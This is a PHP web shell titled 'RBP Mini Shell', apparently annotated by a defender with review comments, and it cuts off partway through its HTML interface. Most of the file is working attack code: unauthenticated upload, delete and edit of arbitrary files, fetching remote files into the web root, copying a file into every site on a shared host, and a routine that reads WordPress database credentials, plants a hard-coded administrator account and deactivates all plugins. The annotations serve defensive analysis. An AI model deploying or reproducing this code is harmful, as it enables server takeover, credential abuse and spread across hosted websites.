<?php
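// NOTE(review): this file is a PHP web shell (its own <title> reads "RBP Mini Shell"). The visible code has no login or token check, so every action below is reachable by anyone who can request the URL; a copy found on a server should be handled as an indicator of compromise.
// ============ ERROR REPORTING ============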
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
// ============ DEBUG MODE ============
$DEBUG = true;
$debug_log = array();
function debug($msg, $type = 'INFO') {
global $DEBUG, $debug_log;
if ($DEBUG) {
$debug_log[] = array(
'time' => date('H:i:s'),
'type' => $type,
'msg' => $msg
);
}
}
function show_debug() {
global $DEBUG, $debug_log;
if (!$DEBUG || empty($debug_log)) return;
echo '<div style="position:fixed;bottom:10px;right:10px;width:500px;max-height:400px;overflow-y:auto;background:#0a0a0a;border:2px solid #ff0;border-radius:8px;padding:15px;z-index:99999;font-size:11px;font-family:monospace;color:#0f0;">';
echo '<div style="display:flex;justify-content:space-between;align-items:center;margin-bottom:10px;border-bottom:1px solid #ff0;padding-bottom:8px;">';
echo '<strong style="color:#ff0;font-size:14px;">DEBUG LOG</strong>';
echo '<button onclick="this.parentElement.parentElement.remove()" style="background:#f00;color:#fff;border:none;padding:3px 10px;cursor:pointer;border-radius:3px;font-weight:bold;">X</button>';
echo '</div>';
foreach ($debug_log as $log) {
$color = '#0f0';
if ($log['type'] == 'ERROR') $color = '#ff4444';
elseif ($log['type'] == 'WARN') $color = '#ffaa00';
elseif ($log['type'] == 'SUCCESS') $color = '#00ff00';
elseif ($log['type'] == 'INFO') $color = '#00ccff';
echo "<div style='color:{$color};margin:2px 0;border-bottom:1px solid #1a1a1a;padding:2px 0;'>";
echo "<span style='color:#888;'>[" . $log['time'] . "]</span> ";
echo "<span style='color:#fff;'>[" . $log['type'] . "]</span> ";
echo $log['msg'];
echo "</div>";
}
echo '</div>';
}
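// ============ CONFIGURATION ============
// NOTE(review): $d comes straight from $_GET['d'] and is never confined to a base directory, so the listing and write paths below follow whatever the request supplies.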
$d = isset($_GET['d']) ? $_GET['d'] : getcwd();
$d = str_replace("\\", "/", $d);
if (!isset($_SESSION)) {
session_start();
}
debug("Script loaded successfully");
debug("PHP Version: " . phpversion());
debug("Current directory: " . $d);
debug("Directory writable: " . (is_writable($d) ? 'YES' : 'NO'));
// ============ ORIGINAL FUNCTIONS ============
/**
 * Guess a hosting base directory for the mass-deploy / mass-delete features.
 *
 * Substitutes an account name into a fixed list of shared-hosting path
 * templates and returns the first result that is an existing directory;
 * falls back to getcwd() when none exists.
 *
 * Defender note: the is_dir() probes below reach account home directories
 * and /var/www, i.e. locations outside the directory this script sits in.
 *
 * @return string First matching directory, else the current working directory.
 */
function ad() {
// Path templates; the star is replaced with the account name further down.
$p = array(
'/home/*/domains',
'/home/*/public_html',
'/var/www',
'/home/*/www',
'/home/*/web',
'/home/*/*/public_html',
'/home/*'
);
// passwd entry of the effective UID when the posix extension is present, else a stub array.
$u = function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid()) : array('name' => 'unknown');
// As written, every array value is collapsed to the literal 'unknown';
// only a non-array result reaches the ['name'] lookup.
if (is_array($u)) {
$u = 'unknown';
} else {
$u = $u['name'];
}
foreach ($p as $pth) {
$ep = str_replace('*', $u, $pth);
// First existing directory wins.
if (is_dir($ep)) return $ep;
}
return getcwd();
}
/**
 * List the site-like subdirectories directly under a base directory.
 *
 * A subdirectory qualifies when its name contains a dot (the TLD regex can
 * only match names that already contain one). For each hit the document
 * root is taken to be "<dir>/public_html" when that exists, else the
 * directory itself.
 *
 * Defender note: this is the enumeration step that lets one compromised
 * site reach every other site readable under the same base directory;
 * per-site filesystem isolation is what stops it.
 *
 * @param string $bd Base directory to scan.
 * @return array List of arrays with keys 'name', 'path' and 'url' ('https://' . name).
 */
function gd($bd) {
$sd = array();
if (is_dir($bd)) {
// Immediate child directories only; glob() is not recursive here.
$dd = glob($bd . '/*', GLOB_ONLYDIR);
if ($dd) {
foreach ($dd as $ddr) {
$dn = basename($ddr);
// Domain-name heuristic: any dot in the directory name counts.
if (strpos($dn, '.') !== false || preg_match('/\.(com|net|org|in|co|info|biz|us|uk|ca|au)$/i', $dn)) {
$ph = $ddr . '/public_html';
if (is_dir($ph)) {
$sd[] = array('name' => $dn, 'path' => $ph, 'url' => 'https://' . $dn);
} else {
$sd[] = array('name' => $dn, 'path' => $ddr, 'url' => 'https://' . $dn);
}
}
}
}
}
return $sd;
}
/**
 * Copy one file into every site directory returned by gd($bd).
 *
 * Reads $sf once, then writes its contents to "<site path>/<basename of $sf>"
 * for each site, creating the target directory (mode 0755) when it is missing.
 *
 * Defender note: the observable result is one file name with identical
 * content appearing in many document roots within a single request, so
 * matching name/hash/mtime across sites is a useful hunting pivot.
 *
 * @param string $sf Source file path.
 * @param string $bd Base directory handed to gd().
 * @return array Status lines "[n/total] ...", or array('error' => message)
 *               when $sf does not exist or cannot be read.
 */
function md($sf, $bd) {
$r = array();
$sd = gd($bd);
$t = count($sd);
$p = 0;
if (!file_exists($sf)) return array("error" => "Source file not found: $sf");
$fc = file_get_contents($sf);
if ($fc === false) return array("error" => "Cannot read source file: $sf");
$fn = basename($sf);
foreach ($sd as $s) {
// $p is the 1-based progress counter used in the status lines.
$p++;
$tf = $s['path'] . '/' . $fn;
$td = dirname($tf);
if (!is_dir($td)) {
if (!mkdir($td, 0755, true)) {
$r[] = "[$p/$t] Failed to create directory: " . $s['name'];
continue;
}
}
// An existing file of the same name in the target site is overwritten.
if (file_put_contents($tf, $fc)) {
$r[] = "[$p/$t] Deployed to: " . $s['name'] . " (" . $s['path'] . ")";
} else {
$r[] = "[$p/$t] Failed: " . $s['name'];
}
}
return $r;
}
/**
 * Delete a named file from every site directory returned by gd($bd).
 *
 * Defender note: this removes the files placed by md(), so their absence
 * after an incident does not show that they were never written; rely on
 * access logs and backups rather than the current filesystem state.
 *
 * @param string $bd Base directory handed to gd().
 * @param string $fn File name to remove from each site path.
 * @return array Status lines "[n/total] Deleted from: ..." or "[n/total] Not found: ...".
 */
function mdd($bd, $fn) {
$r = array();
$sd = gd($bd);
$t = count($sd);
$p = 0;
foreach ($sd as $s) {
$p++;
$tf = $s['path'] . '/' . $fn;
// "Not found" is reported both when the file is absent and when unlink() fails.
if (file_exists($tf) && unlink($tf)) {
$r[] = "[$p/$t] Deleted from: " . $s['name'];
} else {
$r[] = "[$p/$t] Not found: " . $s['name'];
}
}
return $r;
}
/**
 * Take over (or create) a WordPress administrator account using the site's
 * own database credentials.
 *
 * Steps, as visible in the body:
 *  1. Walk up from getcwd() (at most 10 levels) until a wp-config.php is found.
 *  2. Regex-extract DB_NAME, DB_USER, DB_PASSWORD, DB_HOST and $table_prefix.
 *  3. Connect with mysqli and hash a hard-coded password with the nested PH class.
 *  4. If a user with the hard-coded login exists, overwrite its password and
 *     e-mail; otherwise attempt to insert the user plus the capabilities and
 *     user_level usermeta rows.
 *  5. Overwrite the active_plugins option with an empty serialized array.
 *
 * Defender note, using only values present in this file: look for a users
 * row whose user_login equals the $nl literal below with user_email
 * 'admin@example.com', for an active_plugins option that suddenly holds an
 * empty array (all plugins deactivated at once), and for reads of
 * wp-config.php by a script outside the WordPress tree. After such an
 * event the database password and all administrator accounts need rotation.
 *
 * @return array array('error' => message) on failure, otherwise an array
 *               with keys 'success', 'creds', 'url', 'dir' and 'wp'.
 */
function wp() {
$cd = getcwd();
$wp = null;
$wd = null;
$sd = $cd;
// Search the current directory and up to nine ancestors for wp-config.php.
for ($i = 0; $i < 10; $i++) {
$cp = $sd . '/wp-config.php';
if (file_exists($cp)) {
$wp = $cp;
$wd = $sd;
break;
}
// Stop at the filesystem root.
if ($sd === '/' || $sd === dirname($sd)) break;
$sd = dirname($sd);
}
if (!$wp) return array('error' => 'WordPress not found');
// Hard-coded login, password and e-mail written into the victim database.
$nl = 'ReaperBythe222@';
$np = 'ReaperBythe222@';
$ne = 'admin@example.com';
// PasswordHash class
// NOTE(review): the '$P$' prefix, 64-character alphabet and iterated MD5
// appear to follow the phpass portable-hash layout; confirm before relying on that.
class PH {
// Encoding alphabet used by e() and for the iteration-count character.
var $i = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
// Base value for the iteration-count character chosen in gs().
var $c = 8;
var $p = true;
// Seed state for the fallback random generator in g().
var $r;
function __construct() {
$this->r = microtime() . uniqid(rand(), true);
}
// Return $n random bytes: /dev/urandom first, MD5-of-microtime stream as fallback.
function g($n) {
$o = '';
if (($fh = @fopen('/dev/urandom', 'rb'))) {
$o = fread($fh, $n);
fclose($fh);
}
if (strlen($o) < $n) {
$o = '';
for ($i = 0; $i < $n; $i += 16) {
$this->r = md5(microtime() . $this->r);
$o .= pack('H*', md5($this->r));
}
$o = substr($o, 0, $n);
}
return $o;
}
// Encode the first $n bytes of $i with the 64-character alphabet, 6 bits per output character.
function e($i, $n) {
$o = '';
$x = 0;
do {
$v = ord($i[$x++]);
$o .= $this->i[$v & 0x3f];
if ($x < $n) $v |= ord($i[$x]) << 8;
else $o .= $this->i[($v >> 6) & 0x3f];
if ($x++ >= $n) break;
if ($x < $n) $v |= ord($i[$x]) << 16;
else $o .= $this->i[($v >> 12) & 0x3f];
$o .= $this->i[($v >> 18) & 0x3f];
} while ($x < $n);
return $o;
}
// Build the setting string: '$P$', one iteration-count character, then 6 encoded salt bytes.
function gs($i) {
$o = '$P$';
$o .= $this->i[min($this->c + 5, 30)];
$o .= $this->e($i, 6);
return $o;
}
// Hash password $p under setting $s; returns '*0' or '*1' when $s is malformed.
function cp($p, $s) {
$o = '*0';
if (substr($s, 0, 2) === $o) $o = '*1';
$id = substr($s, 0, 3);
if ($id !== '$P$' && $id !== '$H$') return $o;
$cl = strpos($this->i, $s[3]);
if ($cl < 7 || $cl > 30) return $o;
// Iteration count is 2 to the power of the decoded count character.
$c = 1 << $cl;
$sa = substr($s, 4, 8);
if (strlen($sa) !== 8) return $o;
$h = md5($sa . $p, true);
do {
$h = md5($h . $p, true);
} while (--$c);
$o = substr($s, 0, 12);
$o .= $this->e($h, 16);
return $o;
}
// Hash $p with a fresh salt; falls back to a bare md5() when the result is not 34 characters.
function hp($p) {
$r = $this->g(6);
$h = $this->cp($p, $this->gs($r));
if (strlen($h) === 34) return $h;
return md5($p);
}
}
// Read the site's configuration and pull the database settings out by regex.
$con = file_get_contents($wp);
preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $con, $m);
$dbn = isset($m[1]) ? $m[1] : null;
preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $con, $m);
$dbu = isset($m[1]) ? $m[1] : null;
preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $con, $m);
$dbp = isset($m[1]) ? $m[1] : null;
preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $con, $m);
$dbh = isset($m[1]) ? $m[1] : null;
preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]\s*;/", $con, $m);
// Table prefix defaults to 'wp_' when the assignment is not matched.
$tp = isset($m[1]) ? $m[1] : 'wp_';
if (!$dbn || !$dbu || !$dbp || !$dbh) return array('error' => 'DB config error');
$mysqli = @new mysqli($dbh, $dbu, $dbp, $dbn);
if ($mysqli->connect_error) return array('error' => 'DB connect failed');
$ph = new PH();
$phash = $ph->hp($np);
// Does a user with the hard-coded login already exist?
$stmt = $mysqli->prepare("SELECT ID FROM `{$tp}users` WHERE user_login = ?");
if ($stmt) {
$stmt->bind_param('s', $nl);
$stmt->execute();
$stmt->bind_result($eid);
$ue = $stmt->fetch();
$stmt->close();
} else {
$ue = false;
}
if ($ue) {
// Existing account: overwrite password hash and e-mail.
$stmt = $mysqli->prepare("UPDATE `{$tp}users` SET user_pass = ?, user_email = ? WHERE ID = ?");
if ($stmt) {
$stmt->bind_param('ssi', $phash, $ne, $eid);
if (!$stmt->execute()) return array('error' => 'Update failed');
$stmt->close();
}
$ac = 'updated';
} else {
// No such account: attempt to insert it with the current timestamp as registration date.
$tm = date('Y-m-d H:i:s');
$stmt = $mysqli->prepare("INSERT INTO `{$tp}users` (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES (?, ?, ?, ?, '', ?, '', 0, ?)");
if ($stmt) {
$un = strtolower($nl);
$dn = $nl;
$stmt->bind_param('sssssss', $nl, $phash, $un, $ne, $tm, $dn);
if (!$stmt->execute()) return array('error' => 'Create failed');
$nid = $stmt->insert_id;
$stmt->close();
// usermeta keys "<prefix>capabilities" and "<prefix>user_level" carry the role.
$ck = $tp . 'capabilities';
$lk = $tp . 'user_level';
$ca = serialize(array('administrator' => true));
$stmt = $mysqli->prepare("INSERT INTO `{$tp}usermeta` (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
if ($stmt) {
$stmt->bind_param('iss', $nid, $ck, $ca);
$stmt->execute();
$stmt->close();
}
$ul = 10;
$lv = (string)$ul;
$stmt = $mysqli->prepare("INSERT INTO `{$tp}usermeta` (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
if ($stmt) {
$stmt->bind_param('iss', $nid, $lk, $lv);
$stmt->execute();
$stmt->close();
}
}
$ac = 'created';
}
// Replace the active plugin list with an empty array, which deactivates every plugin on the site.
$ep = serialize(array());
$stmt = $mysqli->prepare("UPDATE `{$tp}options` SET option_value = ? WHERE option_name = 'active_plugins'");
if ($stmt) {
$stmt->bind_param('s', $ep);
$stmt->execute();
$stmt->close();
}
$mysqli->close();
// Login URL is assembled from request headers (HTTPS flag and Host).
$prot = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') ? "https://" : "http://";
$host = $_SERVER['HTTP_HOST'];
$lu = $prot . $host . '/wp-login.php';
return array(
'success' => "WordPress user $ac!",
'creds' => "User: $nl | Pass: $np",
'url' => $lu,
'dir' => $cd,
'wp' => $wd
);
}
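// ============ MULTIPLE UPLOAD METHODS ============
// NOTE(review): six fallbacks for persisting the upload. Only upload_method_1 checks is_uploaded_file(); the others operate on whatever path is in $file['tmp_name']. The chain presumably exists so that a write still succeeds on hosts where individual file functions fail.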
/**
 * Store an upload with move_uploaded_file().
 *
 * This is the only method in the chain that verifies, via is_uploaded_file(),
 * that tmp_name refers to a file PHP received in this request.
 *
 * @param array  $file One entry of $_FILES (reads 'tmp_name').
 * @param string $dest Destination path; not validated here.
 * @return bool True when the file was moved, false otherwise.
 */
function upload_method_1($file, $dest) {
debug("Method 1: move_uploaded_file()");
if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
debug("Method 1 FAILED: Not valid uploaded file", "WARN");
return false;
}
if (move_uploaded_file($file['tmp_name'], $dest)) {
debug("Method 1 SUCCESS: $dest", "SUCCESS");
return true;
}
debug("Method 1 FAILED", "ERROR");
return false;
}
function upload_method_2($file, $dest) {
debug("Method 2: copy() + unlink()");
if (!file_exists($file['tmp_name'])) {
debug("Method 2 FAILED: tmp file missing", "ERROR");
return false;
}
if (copy($file['tmp_name'], $dest)) {
@unlink($file['tmp_name']);
debug("Method 2 SUCCESS: $dest", "SUCCESS");
return true;
}
debug("Method 2 FAILED", "ERROR");
return false;
}
function upload_method_3($file, $dest) {
debug("Method 3: file_get_contents + file_put_contents");
if (!file_exists($file['tmp_name'])) {
debug("Method 3 FAILED: tmp file missing", "ERROR");
return false;
}
$data = @file_get_contents($file['tmp_name']);
if ($data === false) {
debug("Method 3 FAILED: Cannot read tmp", "ERROR");
return false;
}
if (file_put_contents($dest, $data) !== false) {
@unlink($file['tmp_name']);
debug("Method 3 SUCCESS: " . strlen($data) . " bytes", "SUCCESS");
return true;
}
debug("Method 3 FAILED: Cannot write", "ERROR");
return false;
}
function upload_method_4($file, $dest) {
debug("Method 4: rename()");
if (!file_exists($file['tmp_name'])) {
debug("Method 4 FAILED: tmp file missing", "ERROR");
return false;
}
if (@rename($file['tmp_name'], $dest)) {
debug("Method 4 SUCCESS: $dest", "SUCCESS");
return true;
}
debug("Method 4 FAILED", "ERROR");
return false;
}
function upload_method_5($file, $dest) {
debug("Method 5: fopen stream");
if (!file_exists($file['tmp_name'])) {
debug("Method 5 FAILED: tmp file missing", "ERROR");
return false;
}
$src = @fopen($file['tmp_name'], 'rb');
if (!$src) {
debug("Method 5 FAILED: Cannot open source", "ERROR");
return false;
}
$dst = @fopen($dest, 'wb');
if (!$dst) {
fclose($src);
debug("Method 5 FAILED: Cannot open dest", "ERROR");
return false;
}
$written = stream_copy_to_stream($src, $dst);
fclose($src);
fclose($dst);
if ($written > 0) {
@unlink($file['tmp_name']);
debug("Method 5 SUCCESS: $written bytes", "SUCCESS");
return true;
}
debug("Method 5 FAILED: 0 bytes written", "ERROR");
return false;
}
/**
 * Last-resort write path: generate a throwaway PHP script that recreates the
 * file from an embedded base64 string, include it, and let it delete itself.
 *
 * Defender note: this leaves a short-lived "<dest>.uploader.php" file next
 * to the destination. File-integrity or audit logging that records create
 * and unlink events on the web root will capture it even though it is gone
 * by the time the request finishes; the embedded base64 blob holds the
 * full uploaded content.
 *
 * @param array  $file One entry of $_FILES (reads 'tmp_name'; no is_uploaded_file() check).
 * @param string $dest Destination path; not validated here.
 * @return bool True when $dest exists with a non-zero size afterwards.
 */
function upload_method_6($file, $dest) {
debug("Method 6: Base64 PHP trick");
if (!file_exists($file['tmp_name'])) {
debug("Method 6 FAILED: tmp file missing", "ERROR");
return false;
}
$data = @file_get_contents($file['tmp_name']);
if ($data === false) {
debug("Method 6 FAILED: Cannot read", "ERROR");
return false;
}
$encoded = base64_encode($data);
// Helper script path: destination plus a fixed '.uploader.php' suffix.
$tmp_php = $dest . '.uploader.php';
// Generated script: write the decoded payload to $dest, then unlink itself.
$php_code = "<?php file_put_contents('" . addslashes($dest) . "', base64_decode('$encoded')); unlink(__FILE__); ?>";
if (file_put_contents($tmp_php, $php_code)) {
// Errors from the generated script are suppressed; success is judged from the filesystem below.
@include($tmp_php);
if (file_exists($dest) && filesize($dest) > 0) {
@unlink($file['tmp_name']);
debug("Method 6 SUCCESS", "SUCCESS");
return true;
}
}
debug("Method 6 FAILED", "ERROR");
return false;
}
/**
 * Try each upload_method_N in order and stop at the first one that succeeds.
 *
 * Defender note: because the chain falls through copy(), rename(), stream
 * and include()-based writes, disabling a single PHP function does not
 * block the upload; the effective control is a web root (and upload
 * directory) that the PHP user cannot write executable files into.
 *
 * @param array  $file One entry of $_FILES.
 * @param string $dest Destination path; not validated here.
 * @return bool True as soon as one method reports success, false when all six fail.
 */
function upload_file_all_methods($file, $dest) {
debug("=== Starting Upload ===");
debug("Source: " . $file['tmp_name']);
debug("Dest: $dest");
// Function names, called as variable functions in this order.
$methods = array(
'upload_method_1',
'upload_method_2',
'upload_method_3',
'upload_method_4',
'upload_method_5',
'upload_method_6'
);
foreach ($methods as $method) {
if ($method($file, $dest)) {
debug("=== SUCCESS with $method ===", "SUCCESS");
return true;
}
}
debug("=== ALL METHODS FAILED ===", "ERROR");
// Diagnostics for the operator: target directory writability and the PHP process owner.
debug("Check: Dir writable = " . (is_writable(dirname($dest)) ? 'YES' : 'NO'));
debug("Check: PHP user = " . get_current_user());
return false;
}
// ============ HANDLE ACTIONS ============
// Base directory: read from the baseDir cookie or POST field as-is (no validation), otherwise guessed by ad().
$db = isset($_COOKIE['baseDir']) ? $_COOKIE['baseDir'] : ad();
if (isset($_POST['baseDir'])) {
$db = $_POST['baseDir'];
setcookie("baseDir", $db, time() + 3600);
}
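// Upload: the destination is $d . '/' . the client-supplied file name, with no extension, content-type or path check, so the request decides both where the file lands and what it is called.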
if (isset($_POST['s']) && isset($_FILES['u'])) {
debug("=== UPLOAD REQUEST ===");
debug("Name: " . $_FILES['u']['name']);
debug("Size: " . $_FILES['u']['size']);
debug("Error: " . $_FILES['u']['error']);
if ($_FILES['u']['error'] !== UPLOAD_ERR_OK) {
$errors = array(
1 => 'File too large (upload_max_filesize)',
2 => 'File too large (MAX_FILE_SIZE)',
3 => 'Partial upload',
4 => 'No file selected',
6 => 'Missing temp folder',
7 => 'Disk write failed',
8 => 'PHP extension blocked'
);
$msg = isset($errors[$_FILES['u']['error']]) ? $errors[$_FILES['u']['error']] : 'Unknown error';
debug("Upload error: $msg", "ERROR");
$_SESSION['msg'] = "ERROR: $msg";
} else {
$dest = $d . '/' . $_FILES['u']['name'];
if (upload_file_all_methods($_FILES['u'], $dest)) {
$size = file_exists($dest) ? filesize($dest) : 0;
$_SESSION['msg'] = "SUCCESS: " . $_FILES['u']['name'] . " ($size bytes)";
} else {
$_SESSION['msg'] = "ERROR: All upload methods failed";
}
}
header("Location: ?d=" . urlencode($d));
exit;
}
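// Delete: unlinks whatever path arrives in $_POST['del']; no path restriction or request token is applied first.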
if (isset($_POST['del'])) {
if (@unlink($_POST['del'])) {
$_SESSION['msg'] = "SUCCESS: Deleted";
} else {
$_SESSION['msg'] = "ERROR: Delete failed";
}
header("Location: ?d=" . urlencode($d));
exit;
}
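// Save/Edit: writes $_POST['content'] to the path in $_POST['obj'], so any file writable by the PHP user can be replaced (site code, .htaccess, configuration).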
if (isset($_POST['save']) && isset($_POST['obj']) && isset($_POST['content'])) {
if (file_put_contents($_POST['obj'], $_POST['content']) !== false) {
$_SESSION['msg'] = "SUCCESS: File saved";
} else {
$_SESSION['msg'] = "ERROR: Save failed";
}
header("Location: ?d=" . urlencode(dirname($_POST['obj'])));
exit;
}
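// Rename: renames $_POST['ren'] to $_POST['new'] inside the same directory; the new name is not filtered, so it may itself contain path separators.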
if (isset($_POST['ren']) && isset($_POST['new'])) {
$new = dirname($_POST['ren']) . '/' . $_POST['new'];
if (rename($_POST['ren'], $new)) {
$_SESSION['msg'] = "SUCCESS: Renamed";
} else {
$_SESSION['msg'] = "ERROR: Rename failed";
}
header("Location: ?d=" . urlencode(dirname($_POST['ren'])));
exit;
}
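// WGET: server-side fetch of a request-supplied URL into $d, with TLS peer verification switched off in both the stream context and the cURL fallback. An outbound request from the web server process (user agent 'Mozilla/5.0' on the stream path) followed by a new file in a web directory is a detection signal; egress filtering on the web tier blocks this path.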
if (isset($_POST['wget_url'])) {
$url = $_POST['wget_url'];
$fn = basename($url);
$dest = $d . '/' . $fn;
debug("WGET: $url");
$ctx = stream_context_create(array(
'http' => array('timeout' => 30, 'user_agent' => 'Mozilla/5.0'),
'ssl' => array('verify_peer' => false, 'verify_peer_name' => false)
));
$content = @file_get_contents($url, false, $ctx);
if ($content !== false) {
if (file_put_contents($dest, $content)) {
$_SESSION['msg'] = "SUCCESS: Downloaded $fn (" . strlen($content) . " bytes)";
} else {
$_SESSION['msg'] = "ERROR: Cannot write file";
}
} elseif (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt_array($ch, array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 30
));
$content = curl_exec($ch);
$http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($content !== false && $http == 200) {
if (file_put_contents($dest, $content)) {
$_SESSION['msg'] = "SUCCESS: Downloaded $fn via cURL";
} else {
$_SESSION['msg'] = "ERROR: Cannot write file";
}
} else {
$_SESSION['msg'] = "ERROR: Download failed (HTTP $http)";
}
} else {
$_SESSION['msg'] = "ERROR: No download method available";
}
header("Location: ?d=" . urlencode($d));
exit;
}
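// Mass Deploy: copies the file named in $_POST['deploy_file_path'] into every site directory that gd() finds under the base directory, which the request can override through custom_base_dir.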
if (isset($_POST['mass_deploy'])) {
$sf = isset($_POST['deploy_file_path']) ? $_POST['deploy_file_path'] : '';
if (isset($_POST['custom_base_dir']) && !empty($_POST['custom_base_dir'])) {
$db = $_POST['custom_base_dir'];
}
if (empty($sf) || !file_exists($sf)) {
$_SESSION['mass_deploy_results'] = array("error" => "Source file not found: $sf");
} else {
$_SESSION['mass_deploy_results'] = md($sf, $db);
$_SESSION['mass_deploy_source'] = $sf;
$_SESSION['mass_deploy_base'] = $db;
}
header("Location: ?d=" . urlencode($d));
exit;
}
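// Mass Delete: removes the file with the same base name from every site directory that gd() finds under the base directory (request-overridable through custom_base_dir).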
if (isset($_POST['mass_delete'])) {
$sf = isset($_POST['deploy_file_path']) ? $_POST['deploy_file_path'] : '';
if (isset($_POST['custom_base_dir']) && !empty($_POST['custom_base_dir'])) {
$db = $_POST['custom_base_dir'];
}
$fn = basename($sf);
$_SESSION['mass_delete_results'] = mdd($db, $fn);
$_SESSION['mass_delete_filename'] = $fn;
$_SESSION['mass_delete_base'] = $db;
header("Location: ?d=" . urlencode($d));
exit;
}
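// WP Change: a single POST field (wp_change) triggers wp(), which rewrites or creates a WordPress administrator account and empties active_plugins; the result, including the credentials, is stored in the session for display.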
if (isset($_POST['wp_change'])) {
$_SESSION['wp_results'] = wp();
header("Location: ?d=" . urlencode($d));
exit;
}
// ============ DISPLAY MESSAGES ============
$msg = '';
if (isset($_SESSION['msg'])) {
$msg = $_SESSION['msg'];
unset($_SESSION['msg']);
}
?>
<!DOCTYPE html>
<html>
<head>
<title>RBP Mini Shell</title>
<style>
*{margin:0;padding:0;box-sizing:border-box;}
body{font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;background:#0c0c0c;color:#fff;min-height:100vh;}
.header{background:#0c0c0c;padding:15px 0;border-bottom:2px solid #333;text-align:center;}
.logo-container{display:flex;align-items:center;justify-content:center;gap:15px;margin-bottom:15px;}
.logo{width:50px;height:50px;border-radius:50%;}
.logo-text{font-size:24px;font-weight:bold;background:linear-gradient(45deg,#fff,#000);background-size:200% 200%;-webkit-background-clip:text;-webkit-text-fill-color:transparent;background-clip:text;text-shadow:0 0 10px #fff,0 0 20px #fff,0 0 30px #fff;}
.mini-text{font-size:14px;color:#aaa;margin-top:5px;font-style:italic;}
.toolbar{background:#1a1a1a;padding:10px;text-align:center;border-bottom:1px solid #333;}
.tool-button{display:inline-block;margin:5px;padding:8px 16px;background:#1a1a1a;color:white;text-decoration:none;border-radius:5px;border:1px solid #555;font-size:12px;cursor:pointer;transition:all 0.3s ease;}
.tool-button:hover{background:#333;border-color:#777;}
.upload-section{background:#1a1a1a;padding:15px;text-align:center;border-bottom:1px solid #333;}
.dir-path{background:#1a1a1a;padding:10px;margin:0;border-bottom:1px solid #333;font-size:14px;color:white;}
.dir-path a{color:white;text-decoration:none;font-weight:bold;}
.dir-path a:hover{text-decoration:underline;color:#4fc3f7;}
.file-list{margin:10px;}
.file-item{display:flex;align-items:center;padding:8px;margin:2px 0;background:#1a1a1a;border-radius:5px;border:1px solid #333;transition:all 0.2s ease;color:white;}
.file-item:hover{background:#222;border-color:#555;}
.file-icon{width:30px;text-align:center;font-size:16px;}
.file-name{flex:1;padding:0 10px;cursor:pointer;color:white;}
.file-size{width:80px;text-align:right;font-size:12px;color:#aaa;}
.file-actions{width:250px;text-align:right;}
.file-actions button{margin-left:5px;padding:3px 8px;background:#1a1a1a;color:white;border:1px solid #555;border-radius:3px;cursor:pointer;font-size:11px;}
.file-actions button:hover{background:#333;}
.popup-overlay{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:1000;}
.popup-content{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:#1a1a1a;padding:20px;border-radius:10px;border:2px solid #444;color:#fff;width:700px;max-height:80vh;overflow-y:auto;}
.popup-content input[type="text"],.popup-content textarea{width:100%;padding:10px;margin:10px 0;background:#2a2a2a;border:1px solid #444;border-radius:5px;color:#fff;}
.popup-content button{padding:8px 15px;background:#1a1a1a;color:white;border:1px solid #555;border-radius:5px;cursor:pointer;margin:5px;}
.popup-content button:hover{background:#333;}
.results-popup{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.9);z-index:2000;}
.results-content{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:#1a1a1a;padding:20px;border-radius:10px;border:2px solid #444;color:#fff;width:800px;max-height:80vh;overflow-y:auto;}
.success-box{background:#1a3c1a;border:2px solid #4CAF50;border-radius:8px;padding:20px;margin:15px 0;}
.login-link{display:inline-block;background:#4CAF50;color:white;padding:12px 24px;text-decoration:none;border-radius:5px;font-weight:bold;margin:10px 0;transition:all 0.3s ease;}
.login-link:hover{background:#45a049;transform:translateY(-2px);}
.error-box{background:#3c1a1a;border:2px solid #f44336;border-radius:8px;padding:20px;margin:15px 0;}
.notification{position:fixed;top:10px;right:10px;padding:15px 20px;border-radius:8px;z-index:9999;font-weight:bold;font-size:14px;animation:fadeIn 0.3s;}
.notification.success{background:#4CAF50;color:white;border:2px solid #45a049;}
.notification.error{background:#f44336;color:white;border:2px solid #d32f2f;}
@keyframes fadeIn{from{opacity:0;transform:translateY(-20px);}to{opacity:1;transform:translateY(0);}}
</style>
</head>
<body>
<div class="header">
<div class="logo-container">
<img src="https://i.ibb.co/XZfn7cGz/1764515071979.jpg" class="logo" alt="RBP Logo">
<div>
<div class="logo-text">ReaperBytePH</div>
<div class="mini-text">- Mini Shell</div>
</div>
</div>
<div class="toolbar">
<button class="tool-button" onclick="showPopup('wgetPopup')">WGET</button>
<button class="tool-button" onclick="showPopup('wpPopup')">WP Creds</button>
<button class="tool-button" onclick="showPopup('massDeployPopup')">Mass Deploy</button>
</div>
<div class="upload-section">
<form method="post" enctype="multipart/form-data">
<input type="file" name="u" style="color:#fff;background:#333;padding:5px;border-radius:3px;border:1px solid #555;">
<input type="submit" name="s" value="Upload" class="tool-button">
</form>
</div>
</div>
<?php if ($msg): ?>
<div class="notification <?php echo strpos($msg, 'SUCCESS') !== false ? 'success' : 'error'; ?>">
